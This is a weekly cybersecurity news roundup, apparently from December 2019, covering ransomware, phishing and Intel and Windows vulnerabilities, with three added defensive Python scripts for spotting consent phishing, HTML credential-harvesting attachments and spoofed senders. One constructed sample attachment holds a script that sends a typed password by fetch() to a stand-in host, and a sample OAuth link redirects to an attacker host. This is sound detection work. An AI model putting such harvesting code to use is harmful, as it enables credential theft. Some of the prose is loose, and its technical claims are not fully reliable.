Cybersecurity, or Internet security, is of utmost importance in today's digital world. It is a body of technology, expertise, norms, and processes designed to safeguard devices, data, programs, and networks from attack or unauthorized access. Promoting cybersecurity is essential because all the important institutions, be it government, military, defense, or medical organizations, store massive amounts of sensitive data on networks, computers, and other such devices.
This virtual world of cyberspace has become an integral part of almost every aspect of our daily lives in one way or another, whether it is the idiot box providing entertainment or the internet, which gives us a platform for social gatherings, booking tickets, paying our bills, and even closing business deals. However, are you truly safe on the internet? To answer this question, here are the top cyber updates from the past week.
Crypto Mining Malware Infects 400,000 Systems In Romania
A Romanian cybergang has turned to cryptocurrency mining. It designed malware that mines cryptocurrency on infected machines and also gives the gang access to users' personal details. A press release from the US Attorney's Office for the Northern District of Ohio highlighted the case.
Bucharest, Romania, is the home of the cybergang, and the malware is said to originate from there. It is not a new gang: according to the press release, it has been operating since 2007.
According to FBI special agent Eric Smith, US citizens were the gang's main target. They approached users with offers related to cryptocurrency processing power, and they sent malware to the users' computers to steal their financial and other personal details.
The emails looked like any other email from a legitimate source, so recipients opened them and became victims of a phishing attack.
Although it is not clear how much cryptocurrency the gang stole, in US dollars they were able to make $4 million over the past years.
Potential Financial Services Under Dridex Malware Attack
The Cybersecurity and Infrastructure Security Agency (CISA) has raised the alarm about ongoing Dridex malware attacks. According to various sources at the Department of Homeland Security (DHS), financial services organizations are the target of the latest phishing attacks, so the financial sector, and especially the private sector, is at risk. The news was issued through the cyber awareness system that publishes valid news related to cyber law.
Financial services are now asked to be on alert during their routine, mundane work, because that is exactly what the phishing attackers are targeting. The usual email links, HTML pages, login credentials, and so on are all being monitored. CISA has expressly asked organizations to use every available defense against the Dridex network to protect their work. This applies to all financial sectors, because everybody is online here.
The issues covered by the notice are not merely the Trojan's activities but also security administration, the malware variants, and the mitigations that can affect the sector in any way. CISA believes that one can never be too secure; whatever the sector leaves unguarded will be the weak link if a breach occurs. The notice also asks the sector to re-examine the patterns seen in the recent Dridex banking-trojan attacks and look for ways to prevent a recurrence. CISA wants the financial sector to have robust protections against phishing in place.
Office 365 Accounts Hijacked Via Phishing Attack
Hackers are misusing the Microsoft OAuth API to get into Office 365 accounts. The target isn't the password and username; instead, the attack unlocks the entire account by granting the attacker the authority to access it. Anti-phishing software was designed to stop attacks that impersonate the Microsoft login page; this, however, is a new method that cybercriminals have discovered.
The worst part about this phishing attack is that it cannot be detected easily, and it gives the attacker complete access to the user's account. Most security software relies on the OAuth standard for permission and authentication. Whenever a website needs access to some details, it shows a pop-up that says 'permission requested.' Once the user grants permission, the OAuth provider opens the gate for the website to access the specific data.
The attackers have designed a similar pop-up that asks for the user's permission in the same manner, with only a minute difference. The recipient thinks it is a request from Microsoft via OAuth, and as soon as they accept it, the attacker gets access to read the contacts and the sign-in ID and password, full read/write access to the emails, and control over the account's maintenance settings as well.
Microsoft recommends security measures such as security awareness training, activating multi-factor authentication, phishing protection software, and reviewing the installed apps' authorization access.
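The consent dialog described above is generated from an ordinary OAuth 2.0 authorization URL, so the fields that distinguish a malicious consent request from a legitimate one (the requesting app, the scopes, and the redirect target) are all visible before anyone clicks. The following Python script is an added example, not code from the original article or from Microsoft; it triages such a URL against a hypothetical organisational allow-list. The client IDs, the redirect hosts and both sample URLs are constructed for this example; the scope names are real Microsoft Graph delegated permissions.

```python
"""Triage an OAuth 2.0 authorization (consent) link before a user clicks it.

In consent phishing the sign-in itself is genuine; what matters is which app
is asking, what permissions it wants and where the token is sent. The URLs
and allow-lists below are constructed for this example.
"""
from urllib.parse import parse_qs, urlparse

# Delegated Microsoft Graph permissions that together hand a third party the
# whole mailbox plus a long-lived refresh token (offline_access).
HIGH_RISK_SCOPES = {
    "Mail.Read", "Mail.ReadWrite", "Mail.Send", "Contacts.Read",
    "MailboxSettings.ReadWrite", "Files.ReadWrite.All", "offline_access",
}

# Hypothetical organisational allow-lists: app registrations the tenant has
# approved and the redirect hosts those apps are known to use.
TRUSTED_CLIENT_IDS = {"11111111-2222-3333-4444-555555555555"}
TRUSTED_REDIRECT_HOSTS = {"login.example-corp.com"}


def assess_consent_request(url, trusted_client_ids=TRUSTED_CLIENT_IDS,
                           trusted_redirect_hosts=TRUSTED_REDIRECT_HOSTS):
    """Return the parsed request plus a list of findings and a verdict."""
    query = urlparse(url).query
    params = {k: v[0] for k, v in parse_qs(query).items()}
    scopes = set(params.get("scope", "").split())
    client_id = params.get("client_id", "")
    redirect_host = (urlparse(params.get("redirect_uri", "")).hostname or "").lower()

    findings = []
    risky = sorted(scopes & HIGH_RISK_SCOPES)
    if risky:
        findings.append("high-privilege scopes requested: " + ", ".join(risky))
    if client_id not in trusted_client_ids:
        findings.append(f"client_id {client_id or '<missing>'} is not an approved app")
    if redirect_host not in trusted_redirect_hosts:
        findings.append(f"redirect_uri host {redirect_host or '<missing>'} is not allow-listed")
    if params.get("prompt") == "consent":
        findings.append("prompt=consent forces the permission dialog to appear")

    if risky and client_id not in trusted_client_ids:
        verdict = "block"      # unknown app asking for mailbox-wide access
    elif findings:
        verdict = "review"
    else:
        verdict = "allow"
    return {"client_id": client_id, "scopes": scopes,
            "redirect_host": redirect_host, "findings": findings, "verdict": verdict}


# Constructed samples: a consent-phishing style request and a legitimate one.
PHISHING_URL = (
    "https://login.microsoftonline.com/common/oauth2/v2.0/authorize"
    "?client_id=deadbeef-0000-0000-0000-000000000001&response_type=code"
    "&redirect_uri=https%3A%2F%2Fattacker.example%2Fcallback"
    "&scope=openid%20offline_access%20Mail.ReadWrite%20Contacts.Read&prompt=consent"
)
LEGITIMATE_URL = (
    "https://login.microsoftonline.com/common/oauth2/v2.0/authorize"
    "?client_id=11111111-2222-3333-4444-555555555555&response_type=code"
    "&redirect_uri=https%3A%2F%2Flogin.example-corp.com%2Fcallback&scope=openid%20User.Read"
)

if __name__ == "__main__":
    for name, url in (("phishing", PHISHING_URL), ("legitimate", LEGITIMATE_URL)):
        result = assess_consent_request(url)
        print(name, "->", result["verdict"])
        for finding in result["findings"]:
            print("   ", finding)
```

The same three questions (which app, which scopes, which redirect host) are what an administrator should ask when reviewing already-granted apps in the tenant, which is the review Microsoft recommends above; a grant that would have been blocked here is one to revoke.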
Ransomware Threat On NAS Devices
NAS, or Network-Attached Storage, is used for backups in offices as well as homes, and these devices are under direct ransomware threat. The attacks begin by scanning for every vulnerable NAS device that is reachable; an unpatched device becomes the target for deploying the malware.
As the name suggests, this is a new way of targeting users in which the attacker sends malware that encrypts the files on the system; sometimes the hackers encrypt the full drive. After this, the hacker sends a note to the victim demanding a ransom to decrypt the files.
According to researchers from Kaspersky, NAS devices are under direct threat of such attacks, which can come in the form of malware, phishing, and even spoofing.
The latest ransomware detected was PureLocker, in November 2019. It targets the servers of big enterprises to extract and encrypt highly confidential files. Intezer and IBM X-Force issued the report.
To prevent this, one can avoid using default credentials and stay up to date on the latest threats and the means by which they compromise systems. Awareness is the key to staying safe, because an attack succeeds when the target has no clue that the links or web pages are hijacked and can cause havoc. It is the easiest and yet most effective way to prevent attacks such as spear phishing.
Bitcoin Ransomware Locks 10 Years’ Worth Of Government Data In Argentina
The recent news that made headlines in the cyber world was Bitcoin attackers hacking a data center in Argentina. What makes this attack unique is that the data center houses government files, and given the government conspiracies of the past few years, the question is what the attackers might uncover in the following weeks. Officials said that 7700 GB worth of data was compromised, but the center was lucky to recover 90% of it.
The attack took place on November 25, and the official statement was made later by the personnel. The attackers hacked 10 years' worth of information, and although the files have been recovered, decrypting them will take another 15 days. Decryption has to be done thoroughly, as the hackers might have added something of their own that could turn out to be a mess in the coming years.
The ransom demanded by the Bitcoin attackers was around $37,000-$370,000 in exchange for the files. It is still unclear whether it was paid. According to a report by Hard Fork, ransomware named Sodinokibi earned the attackers $287,000 in Bitcoin in just three days.
New Scam To Steal The Credentials
Recently, ISC security researcher Jan Kopriva noticed a phishing campaign that steals credentials. The reason it made the news is that it differs from old-fashioned phishing attacks. The campaign used email to carry out the attacks, and the email carried a traditional payment-themed phishing text. What makes it special is that this credential-phishing attack doesn't lead the target to another site, as regular phishing campaigns do; instead, it leads to an HTML attachment, which makes it look less suspicious and gains the user's trust.
Usually, users detect the scam when a link is attached, but that is not the case here. To avoid links, the new campaign opted for a self-contained web page to steal the credentials. It takes time for the user to realize that this may be a scam, and by then, the damage is done.
Although this isn't the first phishing campaign to use this technique, security experts say it is one of the few to contain such a complex HTML attachment. When the targeted person opens the attachment, a fake Microsoft document page opens in the browser. The page offers a login, and once the credentials are entered, the phishing attacker's work is over. Even if the user later realizes that it is a phishing attack, it is too late, as the credentials have already been harvested. To avoid such attacks, which bypass security filters, Jan Kopriva suggests using phishing prevention software as well as other safety measures such as security awareness training.
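Because the attachment is self-contained, link-based filters have nothing to inspect; what can still be inspected is where the page would send whatever the user types into it. The following Python script is an added example, not code from the original article or from the ISC researcher; it parses an HTML attachment with the standard library, looks for a form containing a password field, and reports the host that would receive the submission, whether via the form's `action` or via inline script. The sample attachment and the benign newsletter are constructed for this example.

```python
"""Flag HTML e-mail attachments that carry a self-contained credential form.

With no link to inspect, the useful question is where the page would send
what the user types: look for a password field and the host that receives it.
The attachment and newsletter below are constructed for this example.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

URL_RE = re.compile(r"https?://[^\s'\"<>]+")


class _FormScanner(HTMLParser):
    """Collect each <form> (action + input types) and inline <script> bodies."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self.scripts = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "form":
            self.forms.append({"action": a.get("action", ""), "inputs": set()})
        elif tag == "input" and self.forms:
            self.forms[-1]["inputs"].add(a.get("type", "text").lower())
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.scripts.append(data)


def scan_html_attachment(html):
    """Return a list of findings; an empty list means nothing suspicious."""
    scanner = _FormScanner()
    scanner.feed(html)
    findings = []
    for form in scanner.forms:
        if "password" not in form["inputs"]:
            continue
        host = urlparse(form["action"]).hostname
        if host:
            findings.append(f"password form posts to external host {host}")
        else:
            findings.append("password form with relative or empty action")
    script = "\n".join(scanner.scripts)
    # A script that reads a password field and calls fetch/XMLHttpRequest is
    # the same exfiltration without a form action.
    if re.search(r"password", script, re.I) and re.search(r"XMLHttpRequest|fetch\(", script):
        hosts = sorted({urlparse(u).hostname for u in URL_RE.findall(script)} - {None})
        findings.append("script submits password via HTTP to " + (", ".join(hosts) or "<unknown>"))
    if re.search(r"\b(atob|unescape)\(", script):
        findings.append("obfuscated script content (atob/unescape)")
    return findings


def is_suspicious(html):
    return bool(scan_html_attachment(html))


# Constructed sample: a "document" page that asks for the mailbox password.
SAMPLE_ATTACHMENT = """<html><body>
<h2>Invoice_2019.pdf is protected. Sign in to view.</h2>
<form id="f" action="https://harvest.example/collect.php" method="post">
  <input type="email" name="user"><input type="password" name="pass">
  <input type="submit" value="Open document">
</form>
<script>
var p = document.getElementById('f');
var body = 'u=' + p.user.value + '&password=' + p.pass.value;
fetch('https://harvest.example/api', {method: 'POST', body: body});
</script></body></html>"""

BENIGN_NEWSLETTER = "<html><body><p>Monthly update: no action required.</p></body></html>"

if __name__ == "__main__":
    for finding in scan_html_attachment(SAMPLE_ATTACHMENT):
        print("-", finding)
    print("newsletter suspicious:", is_suspicious(BENIGN_NEWSLETTER))
```

A mail gateway can run this on every `text/html` attachment and quarantine on a non-empty result; the obfuscation check exists because a real lure often base64-encodes the page body so that the form and the receiving host only appear after decoding, which is a finding in itself.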
Charities Under Attack By The Cyber Criminals As Stated By The UK Government
The UK Government issued an alert to many charitable trusts as well as homes to be careful of fraudsters. The report mentions that many cybercriminals gain access to employees' accounts by obtaining their details via spoofing.
The impersonators spoofed employees' email addresses and used them to ask the enterprise HR department to change their bank account details. As the spoofed address is similar to the actual employee's email address, the request was presumably granted by the enterprise officials.
Because of this, charities have been asked to take extra precautions such as providing training on email phishing prevention, cross-checking the validity of the sender's email address in the case of a bank-details change request, and not opening any attachments or links contained in such email requests.
The government has also warned charities not to publicize their future plans or their financial matters. Keeping all of this within the organization can prevent such attacks too.
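The cross-check the government asks for can be partly automated: the display name in a message says whatever the sender wants, but the domain behind the address and the Reply-To header can be compared mechanically against the organization's own domain. The following Python script is an added example, not code from the original article or from the UK Government's alert; it flags sender domains that are one or two characters away from the real one or that use common look-alike substitutions, and reports when replies would be routed elsewhere. The organisational domain and both messages are constructed for this example.

```python
"""Check whether a bank-details change request really comes from the employee.

Display names can say anything; what can be checked mechanically is the
address domain behind the name and whether replies would go elsewhere.
The messages and the organisational domain below are constructed for this
example.
"""
from email import message_from_string
from email.utils import parseaddr

ORG_DOMAIN = "example-charity.org"   # hypothetical organisational domain


def levenshtein(a, b):
    """Edit distance, used to catch one- or two-character domain changes."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def _normalize(domain):
    """Collapse common look-alike substitutions (rn->m, vv->w, 0->o, 1->l)."""
    d = domain.lower()
    for src, dst in (("rn", "m"), ("vv", "w"), ("0", "o"), ("1", "l"), ("-", "")):
        d = d.replace(src, dst)
    return d


def classify_sender(raw_message, org_domain=ORG_DOMAIN):
    """Return findings about the From/Reply-To domains; empty means internal."""
    msg = message_from_string(raw_message)
    from_domain = parseaddr(msg.get("From", ""))[1].rpartition("@")[2].lower()
    reply_domain = parseaddr(msg.get("Reply-To", ""))[1].rpartition("@")[2].lower()
    findings = []
    if from_domain != org_domain:
        if (_normalize(from_domain) == _normalize(org_domain)
                or levenshtein(from_domain, org_domain) <= 2):
            findings.append(f"look-alike sender domain {from_domain} (expected {org_domain})")
        else:
            findings.append(f"external sender domain {from_domain}")
    # A Reply-To pointing elsewhere means the conversation leaves the
    # employee's real mailbox even when the From address looks right.
    if reply_domain and reply_domain != from_domain:
        findings.append(f"Reply-To domain {reply_domain} differs from From domain")
    return findings


# Constructed messages: a look-alike domain ("charlty") with an external
# Reply-To, and a genuine internal request.
SPOOFED_REQUEST = """From: "Alice Smith" <alice.smith@example-charlty.org>
Reply-To: alice.smith.hr@freemail.example
To: payroll@example-charity.org
Subject: Updated bank account for my salary

Hi, please change my salary account to the new details below. Thanks!
"""

GENUINE_REQUEST = """From: "Alice Smith" <alice.smith@example-charity.org>
To: payroll@example-charity.org
Subject: Updated bank account for my salary

Hi, please change my salary account. I will confirm by phone.
"""

if __name__ == "__main__":
    for label, raw in (("spoofed", SPOOFED_REQUEST), ("genuine", GENUINE_REQUEST)):
        print(label, "->", classify_sender(raw) or ["no header findings; confirm by phone"])
```

An empty result does not prove the request is genuine (a compromised real mailbox passes every header check), which is why the alert pairs the address check with out-of-band confirmation of any bank-details change.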
The Zero-Day Attack Fixed by Microsoft (Win32k)
On Tuesday, 10th Dec '19, Microsoft released a patch for the zero-day attack on Win32k. With the December security updates, Microsoft issued 2 advisories along with fixes for 36 vulnerabilities. Windows updates for the critical issues related to the attack have already been released.
It is advised to install these security updates on every device in order to stay safe from future vulnerabilities and for phishing attack prevention. The vulnerability is tracked as CVE-2019-1458, and the update for it prevents the attacker from entering kernel mode and accessing the operating system.
In total, 2 advisories were released, namely ADV190026 and ADV990001, covering the cleanup of orphaned keys and updates to the latest servicing stacks. More advisories were released based on the criticality of the vulnerabilities; however, the above two were the ones related to the Win32k attack.
Ransomware Detected As ‘Maze,’ For The Cyber Attack In Pensacola
The city of Pensacola was attacked by ransomware that stole critical files from the victim's systems. It has been identified as the same malware that was used to steal files from a security company named Allied Universal. The malware's name is 'Maze Ransomware'.
The attackers demanded a tremendous amount of money for the stolen files; however, the enterprise missed the deadline. After this, the attackers released 700 MB of files, for which they had asked for 300 bitcoins, which amounts to $2.3 million.
A similar incident happened in the City of Baltimore, where files were stolen and a ransom was demanded. Due to organizations' negligence against phishing attacks, cybercriminals gain access to employees' emails and are able to obtain critical information via a malware attack.
Flaw Detected In Intel CPU That Manipulates The System
According to news published on 12th Dec '19, Intel CPUs had a flaw that exposed systems to attack. All SGX-enabled systems were said to be affected. It arises from the setting of frequency and voltage in the CPU.
These settings are either automatic or manually adjusted by a technician on an Intel CPU. SGX-enabled systems had a flaw for the same reason: frequency and voltage could also be adjusted through an injection attack named Plundervolt.
The problems that occur on the Intel CPU are:
- SGX secrets could be exposed by manipulating the voltage and frequency of the system.
- One could flip the value of a memory cell by manipulating the electrical charge, as in CLKSCREW, a flaw in dynamic voltage and frequency scaling that allows taking full control over the Intel CPU.
- The cryptography in the code was compromised, and Intel SGX code execution can no longer be trusted.
Although attackers have attempted to break into the security features of SGX-enabled Intel CPU systems, Intel has already patched the issue. They did so by disabling access to the MSR, the voltage scaling interface that was the main affected component.